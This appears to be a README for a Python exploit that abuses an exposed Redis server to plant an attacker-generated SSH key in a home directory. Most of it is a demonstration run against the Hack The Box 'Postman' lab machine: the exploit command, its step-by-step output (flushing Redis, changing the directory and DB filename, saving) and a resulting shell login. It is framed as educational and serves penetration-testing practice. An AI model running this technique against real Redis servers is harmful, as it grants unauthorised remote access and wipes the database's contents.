This exploit put a ssh key in any home directory that redis has access to.
The script generate an ssh key pair every time it is execute. The private key save as private.pem is used to ssh to the host.
The example below demonstrates this exploit with the HTB Postman vm.
This was inspired by Avinash-acid and HackTricks
This exploit is mean for strictly educational purposes.
root@kali:~/HTB/Postman/RedisExploit# python ssh_exploit.py 10.10.10.160 /var/lib/redis/.ssh
Namespace(host='10.10.10.160', ssh_dir='/var/lib/redis/.ssh')
Key pairs generated
Redis flushed
public key added to redis
Home directory set
DB filename changed
Setting saved
Done
root@kali:~/HTB/Postman/RedisExploit# ssh redis@10.10.10.160 -i private.pem
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
redis@Postman:~$